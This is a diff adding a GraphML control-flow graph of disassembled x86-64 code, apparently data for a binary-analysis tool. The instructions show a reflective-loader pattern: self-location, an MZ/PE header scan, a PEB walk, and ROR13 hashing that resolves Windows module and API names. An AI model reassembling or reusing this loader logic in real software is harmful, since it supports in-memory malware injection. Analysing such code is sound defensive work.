+          <data key="instruction.source">mov qword ptr [rbp - 8], rax</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1021">
+          <data key="address">0x1021</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488945f0</data>
+          <data key="instruction.source">mov qword ptr [rbp - 0x10], rax</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1025">
+          <data key="address">0x1025</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488945e8</data>
+          <data key="instruction.source">mov qword ptr [rbp - 0x18], rax</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1029">
+          <data key="address">0x1029</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488945e0</data>
+          <data key="instruction.source">mov qword ptr [rbp - 0x20], rax</data>
+        </node>
+        <node id="block.0x1000:instruction.0x102d">
+          <data key="address">0x102d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48898568ffffff</data>
+          <data key="instruction.source">mov qword ptr [rbp - 0x98], rax</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1034">
+          <data key="address">0x1034</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4831c9</data>
+          <data key="instruction.source">xor rcx, rcx</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1037">
+          <data key="address">0x1037</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4885c9</data>
+          <data key="instruction.source">test rcx, rcx</data>
+        </node>
+        <node id="block.0x1000:instruction.0x103a">
+          <data key="address">0x103a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">753b</data>
+          <data key="instruction.source">jne 0x1077</data>
+        </node>
+        <edge source="block.0x1000:instruction.0x1000" target="block.0x1000:instruction.0x1001"/>
+        <edge source="block.0x1000:instruction.0x1000" target="block.0x1000:instruction.0x1004"/>
+        <edge source="block.0x1000:instruction.0x1001" target="block.0x1000:instruction.0x1004"/>
+        <edge source="block.0x1000:instruction.0x1001" target="block.0x1000:instruction.0x101d"/>
+        <edge source="block.0x1000:instruction.0x1001" target="block.0x1000:instruction.0x1021"/>
+        <edge source="block.0x1000:instruction.0x1001" target="block.0x1000:instruction.0x1025"/>
+        <edge source="block.0x1000:instruction.0x1001" target="block.0x1000:instruction.0x1029"/>
+        <edge source="block.0x1000:instruction.0x1001" target="block.0x1000:instruction.0x102d"/>
+        <edge source="block.0x1000:instruction.0x1004" target="block.0x1000:instruction.0x100b"/>
+        <edge source="block.0x1000:instruction.0x100b" target="block.0x1000:instruction.0x100f"/>
+        <edge source="block.0x1000:instruction.0x100b" target="block.0x1000:instruction.0x101a"/>
+        <edge source="block.0x1000:instruction.0x100f" target="block.0x1000:instruction.0x1010"/>
+        <edge source="block.0x1000:instruction.0x1010" target="block.0x1000:instruction.0x1011"/>
+        <edge source="block.0x1000:instruction.0x1011" target="block.0x1000:instruction.0x1012"/>
+        <edge source="block.0x1000:instruction.0x1012" target="block.0x1000:instruction.0x1014"/>
+        <edge source="block.0x1000:instruction.0x1014" target="block.0x1000:instruction.0x1016"/>
+        <edge source="block.0x1000:instruction.0x1016" target="block.0x1000:instruction.0x1018"/>
+        <edge source="block.0x1000:instruction.0x1018" target="block.0x1000:instruction.0x103a"/>
+        <edge source="block.0x1000:instruction.0x101a" target="block.0x1000:instruction.0x101d"/>
+        <edge source="block.0x1000:instruction.0x101a" target="block.0x1000:instruction.0x1021"/>
+        <edge source="block.0x1000:instruction.0x101a" target="block.0x1000:instruction.0x1025"/>
+        <edge source="block.0x1000:instruction.0x101a" target="block.0x1000:instruction.0x1029"/>
+        <edge source="block.0x1000:instruction.0x101a" target="block.0x1000:instruction.0x102d"/>
+        <edge source="block.0x1000:instruction.0x101a" target="block.0x1000:instruction.0x1034"/>
+        <edge source="block.0x1000:instruction.0x101d" target="block.0x1000:instruction.0x103a"/>
+        <edge source="block.0x1000:instruction.0x1021" target="block.0x1000:instruction.0x103a"/>
+        <edge source="block.0x1000:instruction.0x1025" target="block.0x1000:instruction.0x103a"/>
+        <edge source="block.0x1000:instruction.0x1029" target="block.0x1000:instruction.0x103a"/>
+        <edge source="block.0x1000:instruction.0x102d" target="block.0x1000:instruction.0x103a"/>
+        <edge source="block.0x1000:instruction.0x1034" target="block.0x1000:instruction.0x1037"/>
+        <edge source="block.0x1000:instruction.0x1037" target="block.0x1000:instruction.0x103a"/>
+      </graph>
+    </node>
+    <node id="block.0x103c">
+      <data key="address">0x103c</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x103c</data>
+        <data key="type">instructions</data>
+        <node id="block.0x103c:instruction.0x103c">
+          <data key="address">0x103c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">e800000000</data>
+          <data key="instruction.source">call 0x1041</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x1041">
+      <data key="address">0x1041</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1041</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1041:instruction.0x1041">
+          <data key="address">0x1041</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">59</data>
+          <data key="instruction.source">pop rcx</data>
+        </node>
+        <node id="block.0x1041:instruction.0x1042">
+          <data key="address">0x1042</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4881e100f0ffff</data>
+          <data key="instruction.source">and rcx, 0xfffffffffffff000</data>
+        </node>
+        <edge source="block.0x1041:instruction.0x1041" target="block.0x1041:instruction.0x1042"/>
+      </graph>
+    </node>
+    <node id="block.0x1049">
+      <data key="address">0x1049</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1049</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1049:instruction.0x1049">
+          <data key="address">0x1049</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">668b01</data>
+          <data key="instruction.source">mov ax, word ptr [rcx]</data>
+        </node>
+        <node id="block.0x1049:instruction.0x104c">
+          <data key="address">0x104c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">663d4d5a</data>
+          <data key="instruction.source">cmp ax, 0x5a4d</data>
+        </node>
+        <node id="block.0x1049:instruction.0x1050">
+          <data key="address">0x1050</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">751c</data>
+          <data key="instruction.source">jne 0x106e</data>
+        </node>
+        <edge source="block.0x1049:instruction.0x1049" target="block.0x1049:instruction.0x104c"/>
+        <edge source="block.0x1049:instruction.0x104c" target="block.0x1049:instruction.0x1050"/>
+      </graph>
+    </node>
+    <node id="block.0x1052">
+      <data key="address">0x1052</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1052</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1052:instruction.0x1052">
+          <data key="address">0x1052</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b413c</data>
+          <data key="instruction.source">mov eax, dword ptr [rcx + 0x3c]</data>
+        </node>
+        <node id="block.0x1052:instruction.0x1055">
+          <data key="address">0x1055</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">83f840</data>
+          <data key="instruction.source">cmp eax, 0x40</data>
+        </node>
+        <node id="block.0x1052:instruction.0x1058">
+          <data key="address">0x1058</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7214</data>
+          <data key="instruction.source">jb 0x106e</data>
+        </node>
+        <edge source="block.0x1052:instruction.0x1052" target="block.0x1052:instruction.0x1055"/>
+        <edge source="block.0x1052:instruction.0x1055" target="block.0x1052:instruction.0x1058"/>
+      </graph>
+    </node>
+    <node id="block.0x105a">
+      <data key="address">0x105a</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x105a</data>
+        <data key="type">instructions</data>
+        <node id="block.0x105a:instruction.0x105a">
+          <data key="address">0x105a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">3d00040000</data>
+          <data key="instruction.source">cmp eax, 0x400</data>
+        </node>
+        <node id="block.0x105a:instruction.0x105f">
+          <data key="address">0x105f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">730d</data>
+          <data key="instruction.source">jae 0x106e</data>
+        </node>
+        <edge source="block.0x105a:instruction.0x105a" target="block.0x105a:instruction.0x105f"/>
+      </graph>
+    </node>
+    <node id="block.0x1061">
+      <data key="address">0x1061</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1061</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1061:instruction.0x1061">
+          <data key="address">0x1061</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488d1401</data>
+          <data key="instruction.source">lea rdx, [rcx + rax]</data>
+        </node>
+        <node id="block.0x1061:instruction.0x1065">
+          <data key="address">0x1065</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b02</data>
+          <data key="instruction.source">mov eax, dword ptr [rdx]</data>
+        </node>
+        <node id="block.0x1061:instruction.0x1067">
+          <data key="address">0x1067</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">3d50450000</data>
+          <data key="instruction.source">cmp eax, 0x4550</data>
+        </node>
+        <node id="block.0x1061:instruction.0x106c">
+          <data key="address">0x106c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7409</data>
+          <data key="instruction.source">je 0x1077</data>
+        </node>
+        <edge source="block.0x1061:instruction.0x1061" target="block.0x1061:instruction.0x1065"/>
+        <edge source="block.0x1061:instruction.0x1065" target="block.0x1061:instruction.0x1067"/>
+        <edge source="block.0x1061:instruction.0x1067" target="block.0x1061:instruction.0x106c"/>
+      </graph>
+    </node>
+    <node id="block.0x106e">
+      <data key="address">0x106e</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x106e</data>
+        <data key="type">instructions</data>
+        <node id="block.0x106e:instruction.0x106e">
+          <data key="address">0x106e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4881e900100000</data>
+          <data key="instruction.source">sub rcx, 0x1000</data>
+        </node>
+        <node id="block.0x106e:instruction.0x1075">
+          <data key="address">0x1075</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ebd2</data>
+          <data key="instruction.source">jmp 0x1049</data>
+        </node>
+        <edge source="block.0x106e:instruction.0x106e" target="block.0x106e:instruction.0x1075"/>
+      </graph>
+    </node>
+    <node id="block.0x1077">
+      <data key="address">0x1077</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1077</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1077:instruction.0x1077">
+          <data key="address">0x1077</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48894dd8</data>
+          <data key="instruction.source">mov qword ptr [rbp - 0x28], rcx</data>
+        </node>
+        <node id="block.0x1077:instruction.0x107b">
+          <data key="address">0x107b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">65488b042560000000</data>
+          <data key="instruction.source">mov rax, qword ptr gs:[0x60]</data>
+        </node>
+        <node id="block.0x1077:instruction.0x1084">
+          <data key="address">0x1084</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b4018</data>
+          <data key="instruction.source">mov rax, qword ptr [rax + 0x18]</data>
+        </node>
+        <node id="block.0x1077:instruction.0x1088">
+          <data key="address">0x1088</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b4020</data>
+          <data key="instruction.source">mov rax, qword ptr [rax + 0x20]</data>
+        </node>
+        <edge source="block.0x1077:instruction.0x107b" target="block.0x1077:instruction.0x1084"/>
+        <edge source="block.0x1077:instruction.0x1084" target="block.0x1077:instruction.0x1088"/>
+      </graph>
+    </node>
+    <node id="block.0x108c">
+      <data key="address">0x108c</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x108c</data>
+        <data key="type">instructions</data>
+        <node id="block.0x108c:instruction.0x108c">
+          <data key="address">0x108c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4885c0</data>
+          <data key="instruction.source">test rax, rax</data>
+        </node>
+        <node id="block.0x108c:instruction.0x108f">
+          <data key="address">0x108f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0f8407020000</data>
+          <data key="instruction.source">je 0x129c</data>
+        </node>
+        <edge source="block.0x108c:instruction.0x108c" target="block.0x108c:instruction.0x108f"/>
+      </graph>
+    </node>
+    <node id="block.0x1095">
+      <data key="address">0x1095</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1095</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1095:instruction.0x1095">
+          <data key="address">0x1095</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488945a0</data>
+          <data key="instruction.source">mov qword ptr [rbp - 0x60], rax</data>
+        </node>
+        <node id="block.0x1095:instruction.0x1099">
+          <data key="address">0x1099</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">480fb74848</data>
+          <data key="instruction.source">movzx rcx, word ptr [rax + 0x48]</data>
+        </node>
+        <node id="block.0x1095:instruction.0x109e">
+          <data key="address">0x109e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4885c9</data>
+          <data key="instruction.source">test rcx, rcx</data>
+        </node>
+        <node id="block.0x1095:instruction.0x10a1">
+          <data key="address">0x10a1</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0f84e9010000</data>
+          <data key="instruction.source">je 0x1290</data>
+        </node>
+        <edge source="block.0x1095:instruction.0x1095" target="block.0x1095:instruction.0x10a1"/>
+        <edge source="block.0x1095:instruction.0x1099" target="block.0x1095:instruction.0x109e"/>
+        <edge source="block.0x1095:instruction.0x109e" target="block.0x1095:instruction.0x10a1"/>
+      </graph>
+    </node>
+    <node id="block.0x10a7">
+      <data key="address">0x10a7</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x10a7</data>
+        <data key="type">instructions</data>
+        <node id="block.0x10a7:instruction.0x10a7">
+          <data key="address">0x10a7</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b5050</data>
+          <data key="instruction.source">mov rdx, qword ptr [rax + 0x50]</data>
+        </node>
+        <node id="block.0x10a7:instruction.0x10ab">
+          <data key="address">0x10ab</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4531e4</data>
+          <data key="instruction.source">xor r12d, r12d</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x10ae">
+      <data key="address">0x10ae</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x10ae</data>
+        <data key="type">instructions</data>
+        <node id="block.0x10ae:instruction.0x10ae">
+          <data key="address">0x10ae</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">41c1cc0d</data>
+          <data key="instruction.source">ror r12d, 0xd</data>
+        </node>
+        <node id="block.0x10ae:instruction.0x10b2">
+          <data key="address">0x10b2</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0fb61a</data>
+          <data key="instruction.source">movzx ebx, byte ptr [rdx]</data>
+        </node>
+        <node id="block.0x10ae:instruction.0x10b5">
+          <data key="address">0x10b5</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">80fb61</data>
+          <data key="instruction.source">cmp bl, 0x61</data>
+        </node>
+        <node id="block.0x10ae:instruction.0x10b8">
+          <data key="address">0x10b8</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7203</data>
+          <data key="instruction.source">jb 0x10bd</data>
+        </node>
+        <edge source="block.0x10ae:instruction.0x10ae" target="block.0x10ae:instruction.0x10b5"/>
+        <edge source="block.0x10ae:instruction.0x10ae" target="block.0x10ae:instruction.0x10b8"/>
+        <edge source="block.0x10ae:instruction.0x10b2" target="block.0x10ae:instruction.0x10b5"/>
+        <edge source="block.0x10ae:instruction.0x10b5" target="block.0x10ae:instruction.0x10b8"/>
+      </graph>
+    </node>
+    <node id="block.0x10ba">
+      <data key="address">0x10ba</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x10ba</data>
+        <data key="type">instructions</data>
+        <node id="block.0x10ba:instruction.0x10ba">
+          <data key="address">0x10ba</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">80eb20</data>
+          <data key="instruction.source">sub bl, 0x20</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x10bd">
+      <data key="address">0x10bd</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x10bd</data>
+        <data key="type">instructions</data>
+        <node id="block.0x10bd:instruction.0x10bd">
+          <data key="address">0x10bd</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4101dc</data>
+          <data key="instruction.source">add r12d, ebx</data>
+        </node>
+        <node id="block.0x10bd:instruction.0x10c0">
+          <data key="address">0x10c0</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48ffc2</data>
+          <data key="instruction.source">inc rdx</data>
+        </node>
+        <node id="block.0x10bd:instruction.0x10c3">
+          <data key="address">0x10c3</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48ffc9</data>
+          <data key="instruction.source">dec rcx</data>
+        </node>
+        <node id="block.0x10bd:instruction.0x10c6">
+          <data key="address">0x10c6</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">75e6</data>
+          <data key="instruction.source">jne 0x10ae</data>
+        </node>
+        <edge source="block.0x10bd:instruction.0x10bd" target="block.0x10bd:instruction.0x10c0"/>
+        <edge source="block.0x10bd:instruction.0x10c0" target="block.0x10bd:instruction.0x10c3"/>
+        <edge source="block.0x10bd:instruction.0x10c3" target="block.0x10bd:instruction.0x10c6"/>
+      </graph>
+    </node>
+    <node id="block.0x10c8">
+      <data key="address">0x10c8</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x10c8</data>
+        <data key="type">instructions</data>
+        <node id="block.0x10c8:instruction.0x10c8">
+          <data key="address">0x10c8</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4181fc5bbc4a6a</data>
+          <data key="instruction.source">cmp r12d, 0x6a4abc5b</data>
+        </node>
+        <node id="block.0x10c8:instruction.0x10cf">
+          <data key="address">0x10cf</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7412</data>
+          <data key="instruction.source">je 0x10e3</data>
+        </node>
+        <edge source="block.0x10c8:instruction.0x10c8" target="block.0x10c8:instruction.0x10cf"/>
+      </graph>
+    </node>
+    <node id="block.0x10d1">
+      <data key="address">0x10d1</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x10d1</data>
+        <data key="type">instructions</data>
+        <node id="block.0x10d1:instruction.0x10d1">
+          <data key="address">0x10d1</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4181fc5d68fa3c</data>
+          <data key="instruction.source">cmp r12d, 0x3cfa685d</data>
+        </node>
+        <node id="block.0x10d1:instruction.0x10d8">
+          <data key="address">0x10d8</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0f84ba000000</data>
+          <data key="instruction.source">je 0x1198</data>
+        </node>
+        <edge source="block.0x10d1:instruction.0x10d1" target="block.0x10d1:instruction.0x10d8"/>
+      </graph>
+    </node>
+    <node id="block.0x10de">
+      <data key="address">0x10de</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x10de</data>
+        <data key="type">instructions</data>
+        <node id="block.0x10de:instruction.0x10de">
+          <data key="address">0x10de</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">e9ad010000</data>
+          <data key="instruction.source">jmp 0x1290</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x10e3">
+      <data key="address">0x10e3</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x10e3</data>
+        <data key="type">instructions</data>
+        <node id="block.0x10e3:instruction.0x10e3">
+          <data key="address">0x10e3</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b45a0</data>
+          <data key="instruction.source">mov rax, qword ptr [rbp - 0x60]</data>
+        </node>
+        <node id="block.0x10e3:instruction.0x10e7">
+          <data key="address">0x10e7</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c8b6820</data>
+          <data key="instruction.source">mov r13, qword ptr [rax + 0x20]</data>
+        </node>
+        <node id="block.0x10e3:instruction.0x10eb">
+          <data key="address">0x10eb</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c896dd0</data>
+          <data key="instruction.source">mov qword ptr [rbp - 0x30], r13</data>
+        </node>
+        <node id="block.0x10e3:instruction.0x10ef">
+          <data key="address">0x10ef</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">e89e040000</data>
+          <data key="instruction.source">call 0x1592</data>
+        </node>
+        <edge source="block.0x10e3:instruction.0x10e3" target="block.0x10e3:instruction.0x10e7"/>
+        <edge source="block.0x10e3:instruction.0x10e7" target="block.0x10e3:instruction.0x10eb"/>
+        <edge source="block.0x10e3:instruction.0x10eb" target="block.0x10e3:instruction.0x10ef"/>
+      </graph>
+    </node>
+    <node id="block.0x10f4">
+      <data key="address">0x10f4</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x10f4</data>
+        <data key="type">instructions</data>
+        <node id="block.0x10f4:instruction.0x10f4">
+          <data key="address">0x10f4</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48c78578ffffff02000000</data>
+          <data key="instruction.source">mov qword ptr [rbp - 0x88], 2</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x10ff">
+      <data key="address">0x10ff</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x10ff</data>
+        <data key="type">instructions</data>
+        <node id="block.0x10ff:instruction.0x10ff">
+          <data key="address">0x10ff</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b4590</data>
+          <data key="instruction.source">mov rax, qword ptr [rbp - 0x70]</data>
+        </node>
+        <node id="block.0x10ff:instruction.0x1103">
+          <data key="address">0x1103</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4885c0</data>
+          <data key="instruction.source">test rax, rax</data>
+        </node>
+        <node id="block.0x10ff:instruction.0x1106">
+          <data key="address">0x1106</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0f8454010000</data>
+          <data key="instruction.source">je 0x1260</data>
+        </node>
+        <edge source="block.0x10ff:instruction.0x10ff" target="block.0x10ff:instruction.0x1103"/>
+        <edge source="block.0x10ff:instruction.0x1103" target="block.0x10ff:instruction.0x1106"/>
+      </graph>
+    </node>
+    <node id="block.0x110c">
+      <data key="address">0x110c</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x110c</data>
+        <data key="type">instructions</data>
+        <node id="block.0x110c:instruction.0x110c">
+          <data key="address">0x110c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48ffc8</data>
+          <data key="instruction.source">dec rax</data>
+        </node>
+        <node id="block.0x110c:instruction.0x110f">
+          <data key="address">0x110f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48894590</data>
+          <data key="instruction.source">mov qword ptr [rbp - 0x70], rax</data>
+        </node>
+        <node id="block.0x110c:instruction.0x1113">
+          <data key="address">0x1113</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b4db8</data>
+          <data key="instruction.source">mov rcx, qword ptr [rbp - 0x48]</data>
+        </node>
+        <node id="block.0x110c:instruction.0x1117">
+          <data key="address">0x1117</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b09</data>
+          <data key="instruction.source">mov ecx, dword ptr [rcx]</data>
+        </node>
+        <node id="block.0x110c:instruction.0x1119">
+          <data key="address">0x1119</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48034dd0</data>
+          <data key="instruction.source">add rcx, qword ptr [rbp - 0x30]</data>
+        </node>
+        <node id="block.0x110c:instruction.0x111d">
+          <data key="address">0x111d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">e8a8040000</data>
+          <data key="instruction.source">call 0x15ca</data>
+        </node>
+        <edge source="block.0x110c:instruction.0x110c" target="block.0x110c:instruction.0x110f"/>
+        <edge source="block.0x110c:instruction.0x110c" target="block.0x110c:instruction.0x1119"/>
+        <edge source="block.0x110c:instruction.0x110f" target="block.0x110c:instruction.0x111d"/>
+        <edge source="block.0x110c:instruction.0x1113" target="block.0x110c:instruction.0x1117"/>
+        <edge source="block.0x110c:instruction.0x1117" target="block.0x110c:instruction.0x1119"/>
+        <edge source="block.0x110c:instruction.0x1119" target="block.0x110c:instruction.0x111d"/>
+      </graph>
+    </node>
+    <node id="block.0x1122">
+      <data key="address">0x1122</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1122</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1122:instruction.0x1122">
+          <data key="address">0x1122</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48898570ffffff</data>
+          <data key="instruction.source">mov qword ptr [rbp - 0x90], rax</data>
+        </node>
+        <node id="block.0x1122:instruction.0x1129">
+          <data key="address">0x1129</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">3d8e4e0eec</data>
+          <data key="instruction.source">cmp eax, 0xec0e4e8e</data>
+        </node>
+        <node id="block.0x1122:instruction.0x112e">
+          <data key="address">0x112e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7409</data>
+          <data key="instruction.source">je 0x1139</data>
+        </node>
+        <edge source="block.0x1122:instruction.0x1122" target="block.0x1122:instruction.0x112e"/>
+        <edge source="block.0x1122:instruction.0x1129" target="block.0x1122:instruction.0x112e"/>
+      </graph>
+    </node>
+    <node id="block.0x1130">
+      <data key="address">0x1130</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1130</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1130:instruction.0x1130">
+          <data key="address">0x1130</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">3daafc0d7c</data>
+          <data key="instruction.source">cmp eax, 0x7c0dfcaa</data>
+        </node>
+        <node id="block.0x1130:instruction.0x1135">
+          <data key="address">0x1135</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7402</data>
+          <data key="instruction.source">je 0x1139</data>
+        </node>
+        <edge source="block.0x1130:instruction.0x1130" target="block.0x1130:instruction.0x1135"/>
+      </graph>
+    </node>
+    <node id="block.0x1137">
+      <data key="address">0x1137</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1137</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1137:instruction.0x1137">
+          <data key="address">0x1137</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">eb50</data>
+          <data key="instruction.source">jmp 0x1189</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x1139">
+      <data key="address">0x1139</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1139</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1139:instruction.0x1139">
+          <data key="address">0x1139</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c8b75c0</data>
+          <data key="instruction.source">mov r14, qword ptr [rbp - 0x40]</data>
+        </node>
+        <node id="block.0x1139:instruction.0x113d">
+          <data key="address">0x113d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">458b761c</data>
+          <data key="instruction.source">mov r14d, dword ptr [r14 + 0x1c]</data>
+        </node>
+        <node id="block.0x1139:instruction.0x1141">
+          <data key="address">0x1141</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c0375d0</data>
+          <data key="instruction.source">add r14, qword ptr [rbp - 0x30]</data>
+        </node>
+        <node id="block.0x1139:instruction.0x1145">
+          <data key="address">0x1145</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c8b7db0</data>
+          <data key="instruction.source">mov r15, qword ptr [rbp - 0x50]</data>
+        </node>
+        <node id="block.0x1139:instruction.0x1149">
+          <data key="address">0x1149</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">450fb73f</data>
+          <data key="instruction.source">movzx r15d, word ptr [r15]</data>
+        </node>
+        <node id="block.0x1139:instruction.0x114d">
+          <data key="address">0x114d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4f8d34be</data>
+          <data key="instruction.source">lea r14, [r14 + r15*4]</data>
+        </node>
+        <node id="block.0x1139:instruction.0x1151">
+          <data key="address">0x1151</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">458b36</data>
+          <data key="instruction.source">mov r14d, dword ptr [r14]</data>
+        </node>
+        <node id="block.0x1139:instruction.0x1154">
+          <data key="address">0x1154</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c0375d0</data>
+          <data key="instruction.source">add r14, qword ptr [rbp - 0x30]</data>
+        </node>
+        <node id="block.0x1139:instruction.0x1158">
+          <data key="address">0x1158</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b8570ffffff</data>
+          <data key="instruction.source">mov eax, dword ptr [rbp - 0x90]</data>
+        </node>
+        <node id="block.0x1139:instruction.0x115e">
+          <data key="address">0x115e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">3d8e4e0eec</data>
+          <data key="instruction.source">cmp eax, 0xec0e4e8e</data>
+        </node>
+        <node id="block.0x1139:instruction.0x1163">
+          <data key="address">0x1163</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7506</data>
+          <data key="instruction.source">jne 0x116b</data>
+        </node>
+        <edge source="block.0x1139:instruction.0x1139" target="block.0x1139:instruction.0x113d"/>
